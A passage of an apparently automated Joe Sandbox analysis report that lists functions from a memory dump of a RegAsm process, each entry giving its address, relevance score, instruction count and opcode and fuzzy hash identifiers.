        • Instruction Fuzzy Hash: 1D3187715083049FD310DF09C880B6BF7E0EB99318F18AA1DF4D8AB391C739D8068B9A
        Function 00416637 Relevance: .1, Instructions: 92COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 88b1e5a90fee89b756768336139c70cd48474458f2621e540c5585c1aeea5517
        • Instruction ID: a009b63b9e9a791cae38541774d5787fe1cbf14bb7d394cb0f1babf1797a705e
        • Opcode Fuzzy Hash: 88b1e5a90fee89b756768336139c70cd48474458f2621e540c5585c1aeea5517
        • Instruction Fuzzy Hash: F8314F396082919BD718CF14D4A06ABB7A1EFCA354F19862DE4C617751D330E851CB89
        Function 00433BF0 Relevance: .1, Instructions: 64COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction ID: 81d89b0ac5dcd8d10e5bc2646e8f6b30e3a7036a2e8761ade0b7638fb5c0cff6
        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
        • Instruction Fuzzy Hash: 2711EC33A091E40EC3168D3C8400565BF930A97636F59A39AF4B5AB2D6D52A8E8B8359
        Function 00426A10 Relevance: .1, Instructions: 63COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 70f398d89658f7bf20746d38084334ee063dbb4a60ebeb23c04b5e62df213ff9
        • Instruction ID: 823b994fb5e49462cdfe3d7dea040b025afc832cdc893ec2633a52bf78430eec
        • Opcode Fuzzy Hash: 70f398d89658f7bf20746d38084334ee063dbb4a60ebeb23c04b5e62df213ff9
        • Instruction Fuzzy Hash: A7019EF1B0075147D620AE51F4C172BB2A9AB82708F19953EE949B7342DB7EEC0486A9
        Function 00421EB0 Relevance: .1, Instructions: 54COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 681f36d4892e3706d65a3bc1e19ee2b28b30128ed6ca0144315eedc87c2a9666
        • Instruction ID: b48e17dc229cc030bbf6952dc211fc9ba39d071c8438bcca50167bfdf8dc3b6a
        • Opcode Fuzzy Hash: 681f36d4892e3706d65a3bc1e19ee2b28b30128ed6ca0144315eedc87c2a9666
        • Instruction Fuzzy Hash: 0011ACB0910B00AFD370DF2ED946713BAF8E70A260F50171EE5AAC7A91E335A4058BD6
        Function 00422E75 Relevance: .0, Instructions: 30COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 191db4d6084d89fe26f21e351e7674ac1c1dc70062e6ab66bc2f6d74317732ae
        • Instruction ID: de556b44f372de2d309952e19880188a8883b7bbb47e85479e6d23b7cd0b585b
        • Opcode Fuzzy Hash: 191db4d6084d89fe26f21e351e7674ac1c1dc70062e6ab66bc2f6d74317732ae
        • Instruction Fuzzy Hash: 01F065B0700A018FD30C8F79C852122B6E2EBCA310B44957D990ACB3F0D978EC018B18
        Function 0040EA70 Relevance: .0, Instructions: 21COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
        • Instruction ID: f7b405df857645bb4d449668f811515aed3229184da796e484aa4b61f44e3cc0
        • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
        • Instruction Fuzzy Hash: BFD0A7616497A20ED7588D3904E0477FBE8FA4B612B1818AFE4D2F3245D234DC164A9C
        Function 0041343E Relevance: .0, Instructions: 14COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: d475b40b366a67423cfe667ac0cdc886378d9c805cda30a273e5a19b308f7e1e
        • Instruction ID: 76855a5bd96b0da9f94c322494c98f5e98be34bab61de8ec9d2dd9b53fb5a492
        • Opcode Fuzzy Hash: d475b40b366a67423cfe667ac0cdc886378d9c805cda30a273e5a19b308f7e1e
        • Instruction Fuzzy Hash: C7C08C6DA5410083CA88DF10FC8263E623A63D7204B09B23CC60BE3341CA28D422854E
        Function 00426483 Relevance: .0, Instructions: 11COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 415b3efd89355d071257ab5488caa97e473daa8a21d3899c4de7242870c4be1c
        • Instruction ID: 7805f9804a0ed9c759cb52df2ca1d8c548a5bd0251b3a4a2711d2032f67bf6fb
        • Opcode Fuzzy Hash: 415b3efd89355d071257ab5488caa97e473daa8a21d3899c4de7242870c4be1c
        • Instruction Fuzzy Hash: 06B092A9C4080086D1913B11BE4243AB0360553608F04303EE94A72242AA2ED11A519F
        Function 0043B776 Relevance: .0, Instructions: 11COMMON
        Download Yara Rule
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 8153a543fd5523b5578e9e9695483bf6168d79d8de76887193e386a0b78202f5
        • Instruction ID: 2ca4701585c8b3fc28de7b9063d2ffa4f529484d87b1ec9c54ca895f48eef1fe
        • Opcode Fuzzy Hash: 8153a543fd5523b5578e9e9695483bf6168d79d8de76887193e386a0b78202f5
        • Instruction Fuzzy Hash: CEC09229A694808B878CCF14DC50632B3FA9BCB204B14F4288006B3A56E234DC069A0C
        Function 004298D7 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 300COMMON
        Download Yara Rule
        Strings
        Memory Dump Source
        • Source File: 00000004.00000002.2574136890.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
        Similarity
        • API ID:
        • String ID: E\XC$MA[J$YDA[
        • API String ID: 0-286078667
        • Opcode ID: d92099dc2dbf92028f1a357af150cc682fae8bf609f88163bd8be50612e37e19
        • Instruction ID: ef954cbd57672fed2eccdff6b2023c048a2983481683537b9076e3848e36cd2d
        • Opcode Fuzzy Hash: d92099dc2dbf92028f1a357af150cc682fae8bf609f88163bd8be50612e37e19
        • Instruction Fuzzy Hash: 8FA14430204B918BD728CF29D840767FBE2AF96310F68866EC4E64B795D738F805CB59